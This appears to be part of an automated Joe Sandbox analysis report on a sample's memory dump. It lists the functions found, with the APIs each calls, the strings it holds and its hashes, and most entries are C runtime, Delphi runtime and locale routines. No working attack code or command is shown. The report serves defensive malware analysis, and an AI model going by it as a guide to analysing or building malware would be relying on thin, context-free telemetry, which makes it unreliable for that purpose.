                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                          • Instruction ID: f94e448063ebc228b9449b5ba3230501cc6d03cdd615012d42eb282d16f4775e
                                                          • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                          • Instruction Fuzzy Hash: 93B19D71900205AFDB22DF78C980BEEBBF9BF49308F14806AE499A7241D7769945CF60
                                                          Function 029C88D6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 029C890F
                                                          • ___free_lconv_mon.LIBCMT ref: 029C891A
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B2F
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B41
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B53
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B65
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B77
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B89
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B9B
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BAD
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BBF
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BD1
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BE3
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BF5
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7C07
                                                          • _free.LIBCMT ref: 029C8931
                                                          • _free.LIBCMT ref: 029C8946
                                                          • _free.LIBCMT ref: 029C8951
                                                          • _free.LIBCMT ref: 029C8973
                                                          • _free.LIBCMT ref: 029C8986
                                                          • _free.LIBCMT ref: 029C8994
                                                          • _free.LIBCMT ref: 029C899F
                                                          • _free.LIBCMT ref: 029C89D7
                                                          • _free.LIBCMT ref: 029C89DE
                                                          • _free.LIBCMT ref: 029C89FB
                                                          • _free.LIBCMT ref: 029C8A13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 3658870901-0
                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction ID: 7b9809cd86793fe96cc66477aa440e2fb62ed76f51e1f2e231ccc229c5f1c65e
                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction Fuzzy Hash: 7A317231600301AFDB26AA78D948B9A77EEFF81354FA0C91DE499D7550DF36E940CB22
                                                          Function 029C7C10 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                          • Instruction ID: 8f21428daf90e28e489402024c65624fd98838aaf634afb2073c0cae6795d21d
                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                          • Instruction Fuzzy Hash: 68C17472D40208ABDB20DBA8CC85FEEB7FDAF49750F144169FA48EB281D67499418F61
                                                          Function 028F2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028F28CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                          • API String ID: 2030045667-32948583
                                                          • Opcode ID: 9e7dd63f4efeda4ff43dfe73bc98b09dc7869f6448f409425838bcdcd39a9e1c
                                                          • Instruction ID: 8c0cc99da83e3139c0387337e875ec4eb163bd0a987e5f9421355ed918aa1d54
                                                          • Opcode Fuzzy Hash: 9e7dd63f4efeda4ff43dfe73bc98b09dc7869f6448f409425838bcdcd39a9e1c
                                                          • Instruction Fuzzy Hash: 67A1F53CA042588BDBA1AA2CCC80BD8B7E5EB09354F1441E5DE4DDB28ACB7599C9CF51
                                                          Function 0298842C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02988439
                                                          • int.LIBCPMT ref: 0298844C
                                                            • Part of subcall function 0298568C: std::_Lockit::_Lockit.LIBCPMT ref: 0298569D
                                                            • Part of subcall function 0298568C: std::_Lockit::~_Lockit.LIBCPMT ref: 029856B7
                                                          • std::_Facet_Register.LIBCPMT ref: 0298848C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02988495
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 029884B3
                                                          • __Init_thread_footer.LIBCMT ref: 029884F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                          • String ID: ,kG$0kG$@!G
                                                          • API String ID: 3815856325-312998898
                                                          • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                          • Instruction ID: 0e2a81417afaa9c971b82a4a469669d2394e1ebc1eb05c6d7a3cfa91d1c6a351
                                                          • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                          • Instruction Fuzzy Hash: 702149325006249BC714FB78C85099D77AAEFC1720B66402AE418EB290DF31AE44CFE4
                                                          Function 029BF731 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                          • Instruction ID: b2c24310a413608f691a2fb49eaa69bad1961f18d7c26af8093a13528265c8f6
                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                          • Instruction Fuzzy Hash: 64118976500108BFCB06EF54CA45DDD3F66FF85350F9184A5B9884F921E736DA509F90
                                                          Function 028F252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
                                                          • Unexpected Memory Leak, xrefs: 028F28C0
                                                          • , xrefs: 028F2814
                                                          • bytes: , xrefs: 028F275D
                                                          • An unexpected memory leak has occurred. , xrefs: 028F2690
                                                          • 7, xrefs: 028F26A1
                                                          • The unexpected small block leaks are:, xrefs: 028F2707
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                          • API String ID: 0-2723507874
                                                          • Opcode ID: d1da22d2f183b29557c513bde7b7d8eb70276c025aede8b6dfb660ee671c3528
                                                          • Instruction ID: ce91b071a7184ea6c584c6ddfaaf1e503dd1e273f37838bfc1d70e32621d92f1
                                                          • Opcode Fuzzy Hash: d1da22d2f183b29557c513bde7b7d8eb70276c025aede8b6dfb660ee671c3528
                                                          • Instruction Fuzzy Hash: 8771D23CA042988FDFA19A2CCC84BD8BBE5EB09314F1040E5DA4DDB28ADB7559C5CF52
                                                          Function 029BC78A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 137591632-1037565863
                                                          • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                          • Instruction ID: 1c795b31cbe6c06c565709ead4275c6176cfc185446c53bccdcc5053e5c814ff
                                                          • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                          • Instruction Fuzzy Hash: 89B14875A012299FDB25DF18C988BEDB7B5FF49304F5085AAD84AA7350E730AE90CF50
                                                          Function 029843C4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 6$8+G$8+G$\lC
                                                          • API String ID: 176396367-559646030
                                                          • Opcode ID: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                          • Instruction ID: 9d0db782326e16533bc3d7c135da0c6ffde96855f79e431d7e0633f2f32622b8
                                                          • Opcode Fuzzy Hash: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                          • Instruction Fuzzy Hash: F751CF712083217BE708B738DC51A6E639EDFD0724F04982EF40E8A1D2EF599D058A6A
                                                          Function 028FBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(00000000,028FC08B,?,?,00000000,00000000), ref: 028FBDF6
                                                            • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$InfoThread
                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                          • API String ID: 4232894706-2493093252
                                                          • Opcode ID: 91ce821f82ff4af3817d0c09dd9e0ef45419fa8a82f1dfcc432c86fcead439de
                                                          • Instruction ID: e7fcd2368355f1e2bcf81bbae1ec8b47d9b5c944af0f175f590da5118c09d94c
                                                          • Opcode Fuzzy Hash: 91ce821f82ff4af3817d0c09dd9e0ef45419fa8a82f1dfcc432c86fcead439de
                                                          • Instruction Fuzzy Hash: 8B61433CB1024C5BDB84E7A8D850ADF77BBDB88304F508436A305EB745DA39DA1A8F52
                                                          Function 0290AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290B000
                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0290B017
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290B0AB
                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 0290B0B7
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 0290B0CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Read$HandleModule
                                                          • String ID: KernelBase$LoadLibraryExA
                                                          • API String ID: 2226866862-113032527
                                                          • Opcode ID: 4598213475649141bb59028087c9083b00ff0602b539d049ec1b04b43289ee89
                                                          • Instruction ID: 1a6a8168b2d5416fd5d85a5a1c5b188684ddaa715f62375ce60218db80a55bd7
                                                          • Opcode Fuzzy Hash: 4598213475649141bb59028087c9083b00ff0602b539d049ec1b04b43289ee89
                                                          • Instruction Fuzzy Hash: BC314F75A40309BFDB60DB68CCC5F5977BCBF05358F004610EA24EB2C5D374A9408BA4
                                                          Function 028F435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F4395
                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F439B
                                                          • GetStdHandle.KERNEL32(000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8), ref: 028F43B0
                                                          • WriteFile.KERNEL32(00000000,000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?), ref: 028F43B6
                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028F43D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHandleWrite$Message
                                                          • String ID: Error$Runtime error at 00000000
                                                          • API String ID: 1570097196-2970929446
                                                          • Opcode ID: 8025a4acfd604310455636980d9143b4041da9a85cd2a536b22fc847deba27b3
                                                          • Instruction ID: 8b13f1fe9ace5b554dc46cd63724e6b011f5c77da718744550d09e97ded5232c
                                                          • Opcode Fuzzy Hash: 8025a4acfd604310455636980d9143b4041da9a85cd2a536b22fc847deba27b3
                                                          • Instruction Fuzzy Hash: EFF0B46DBC8344B9FA50A2A86C4AF6A276C4B45F21F541A06B768E40C2CBA440D88B23
                                                          Function 029C8035 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                          • Instruction ID: f59fcf3ffa31c7fb3ee7b2d07c1d03b4f7f2ecddd1299d5a03b75db2f839f839
                                                          • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                          • Instruction Fuzzy Hash: 1A61C171900205AFDB22DF68C841BAEBBF9FF89720F64456DE958EB241E7309D41CB61
                                                          Function 029C850A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction ID: 5768710533ba1c684e8bef35d3f7dcd9b2033c71338bc5c5cf7144bc20839d22
                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction Fuzzy Hash: C4111F71580B04AAD622BBB0CC4DFCB7B9EAFC5740F908C19A29D76450DA79F9044E51
                                                          Function 0298872E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0298873B
                                                          • int.LIBCPMT ref: 0298874E
                                                            • Part of subcall function 0298568C: std::_Lockit::_Lockit.LIBCPMT ref: 0298569D
                                                            • Part of subcall function 0298568C: std::_Lockit::~_Lockit.LIBCPMT ref: 029856B7
                                                          • std::_Facet_Register.LIBCPMT ref: 0298878E
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02988797
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 029887B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
